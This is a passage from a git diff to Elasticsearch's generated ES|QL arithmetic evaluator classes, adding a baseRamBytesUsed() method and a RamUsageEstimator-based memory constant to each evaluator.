     try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivLongsEvaluator.java
index 40c0df781f9ad..fde09b222c84f 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivLongsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivLongsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class DivLongsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DivLongsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivUnsignedLongsEvaluator.java
index 84547b719e3cb..85064a626a1ca 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivUnsignedLongsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/DivUnsignedLongsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class DivUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(DivUnsignedLongsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModDoublesEvaluator.java
index 1d48d6ba595b8..733469d38d8e3 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModDoublesEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModDoublesEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ModDoublesEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ModDoublesEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModIntsEvaluator.java
index ed5fec274e62c..fa6c02326fa82 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModIntsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModIntsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ModIntsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ModIntsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public IntBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) {
     try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModLongsEvaluator.java
index f061968a07167..5609ee3346800 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModLongsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModLongsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ModLongsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ModLongsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModUnsignedLongsEvaluator.java
index b22af43813552..f82c4f4286958 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModUnsignedLongsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/ModUnsignedLongsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class ModUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ModUnsignedLongsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulDoublesEvaluator.java
index 7e11f0828b5af..b0fe71e1bbafe 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulDoublesEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulDoublesEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class MulDoublesEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MulDoublesEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulIntsEvaluator.java
index dbb4157798e4e..6965be6729e7d 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulIntsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulIntsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class MulIntsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MulIntsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public IntBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) {
     try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulLongsEvaluator.java
index 00433c86570c4..3f4b12014e144 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulLongsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulLongsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class MulLongsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MulLongsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulUnsignedLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulUnsignedLongsEvaluator.java
index d3b0b3c6d54be..93e22f7b24a4d 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulUnsignedLongsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/MulUnsignedLongsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class MulUnsignedLongsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(MulUnsignedLongsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator lhs;
@@ -58,6 +61,14 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += lhs.baseRamBytesUsed();
+    baseRamBytesUsed += rhs.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegDoublesEvaluator.java
index ad0bbfd4f9bb7..49048917f14eb 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegDoublesEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegDoublesEvaluator.java
@@ -7,6 +7,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.DoubleBlock;
 import org.elasticsearch.compute.data.DoubleVector;
@@ -22,6 +23,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class NegDoublesEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NegDoublesEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -48,6 +51,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public DoubleBlock eval(int positionCount, DoubleBlock vBlock) {
     try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegIntsEvaluator.java
index bd186e723a86f..ef3aa7a183c26 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegIntsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegIntsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.IntBlock;
 import org.elasticsearch.compute.data.IntVector;
@@ -23,6 +24,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class NegIntsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NegIntsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public IntBlock eval(int positionCount, IntBlock vBlock) {
     try(IntBlock.Builder result = driverContext.blockFactory().newIntBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegLongsEvaluator.java
index 2f2ef86cbaa3c..65f57ab1af862 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegLongsEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/NegLongsEvaluator.java
@@ -8,6 +8,7 @@
 import java.lang.IllegalArgumentException;
 import java.lang.Override;
 import java.lang.String;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -23,6 +24,8 @@
  * This class is generated. Edit {@code EvaluatorImplementer} instead.
  */
 public final class NegLongsEvaluator implements EvalOperator.ExpressionEvaluator {
+  private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NegLongsEvaluator.class);
+
   private final Source source;
 
   private final EvalOperator.ExpressionEvaluator v;
@@ -49,6 +52,13 @@ public Block eval(Page page) {
     }
   }
 
+  @Override
+  public long baseRamBytesUsed() {
+    long baseRamBytesUsed = BASE_RAM_BYTES_USED;
+    baseRamBytesUsed += v.baseRamBytesUsed();
+    return baseRamBytesUsed;
+  }
+
   public LongBlock eval(int positionCount, LongBlock vBlock) {
     try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) {
       position: for (int p = 0; p < positionCount; p++) {
diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDateNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDateNanosEvaluator.java
index 7418d000281f1..6c64355b50b33 100644
--- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDateNanosEvaluator.java
+++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDateNanosEvaluator.java
@@ -10,6 +10,7 @@
 import java.lang.String;
 import java.time.DateTimeException;
 import java.time.temporal.TemporalAmount;
+import org.apache.lucene.util.RamUsageEstimator;
 import org.elasticsearch.compute.data.Block;
 import org.elasticsearch.compute.data.LongBlock;
 import org.elasticsearch.compute.data.LongVector;
@@ -25,6 +26,8 @@
 * This class is generated. Edit {@code EvaluatorImplementer} instead.
*/ public final class SubDateNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubDateNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator dateNanos; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += dateNanos.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock dateNanosBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDatetimesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDatetimesEvaluator.java index 11a3a97416ef9..d8df3004d5667 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDatetimesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDatetimesEvaluator.java @@ -10,6 +10,7 @@ import java.lang.String; import java.time.DateTimeException; import java.time.temporal.TemporalAmount; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubDatetimesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubDatetimesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator datetime; @@ -54,6 +57,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += datetime.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock datetimeBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDoublesEvaluator.java index 21776d21cadea..08c0130331211 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubDoublesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class SubDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubIntsEvaluator.java index 8a2f431908406..d89463b65c9f9 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/arithmetic/SubIntsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class SubIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(SubIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public IntBlock eval(int positionCount, IntBlock lhsBlock, 